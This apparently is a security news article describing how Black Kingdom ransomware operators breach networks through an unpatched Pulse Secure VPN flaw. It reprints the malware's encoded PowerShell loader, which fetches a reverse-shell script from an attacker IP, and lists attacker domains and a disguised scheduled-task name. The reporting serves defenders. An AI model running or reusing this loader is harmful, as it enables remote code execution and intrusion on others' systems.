Operators of Black Kingdom ransomware are targeting enterprises with unpatched Pulse Secure VPN software or initial access on the network, security researchers have found.

The malware got caught in a honeypot, allowing researchers to analyze and document the tactics used by the threat actors.

Modus operandi

They’re exploiting CVE-2019-11510, a critical vulnerability affecting earlier versions of Pulse Secure VPN that was patched in April 2019. Companies delayed updating their software even after exploits became public, prompting multiple alerts from the U.S. government and threat actors started leveraging it; some organizations continue to run a vulnerable version of the product.

REDTEAM.PL, a company offering cybersecurity services based in Poland, observed that Black Kingdom operators used the same doorway provided by Pulse Secure VPN to breach what they believed was a target.

From the researchers’ observations, the ransomware established persistence by impersonating a legitimate scheduled task for Google Chrome, with a single letter making the difference:

GoogleUpdateTaskMachineUSA - Black Kingdom task
GoogleUpdateTaskMachineUA - legitimate Google Chrome task

According to REDTEAM.PL’s analysis, the scheduled task runs a Base64-encoded string code in a hidden PowerShell window to fetch a script named “reverse.ps1” that is likely used to open a reverse shell on the compromised host.

cversions_cache.ps1 script:

$update = "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQA4AC4AMQAzAC4ANAA5AC4AMQA3ADkALwByAGUAdgBlAHIAcwBlAC4AcABzADEAJwApAA=="

powershell.exe -exec bypass -nologo -Enc $update

Adam Ziaja of REDTEAM.PL told BleepingComputer that the script could not be retrieved from the remote server controlled by the attacker, probably because the server hosting it was blocked before the payload could be delivered.

The IP address where “reverse.ps1” resided is 198.13.49.179, which is managed by Choopa, a child company of Vultr, well known for the cheap virtual private servers (VPS) it provides and for being used by cybercriminals to host their malicious tools.

It resolves to three domains, the third one being connected to other servers in the U.S. and Italy hosting Android and cryptocurrency mining malware.

  • host.cutestboty.com
  • keepass.cutestboty.com
  • anno1119.com

Recent appearance

Black Kingdom ransomware was first spotted in late February by security researcher GrujaRS, who found that it appended the .DEMON extension to encrypted files.

The sample analyzed (12) contacted the same IP address found in REDTEAM.PL’s report. It dropped the following ransom note asking for $10,000 to be deposited to a bitcoin wallet and threatening that failing to do so would lead to the data to be destroyed or sold.

Checking the bitcoin address provided by the attacker shows an empty balance and two incoming transactions totaling 0.55BTC, converted to $5,200 at the moment of writing.

Related Articles:

Magniber ransomware gang now exploits Internet Explorer flaws in attacks

Clop gang exploiting SolarWinds Serv-U flaw in ransomware attacks

Microsoft Exchange ProxyShell exploits used to deploy Babuk ransomware

FBI seized $2.3M from affiliate of REvil, Gandcrab ransomware gangs

Yanluowang ransomware operation matures with experienced affiliates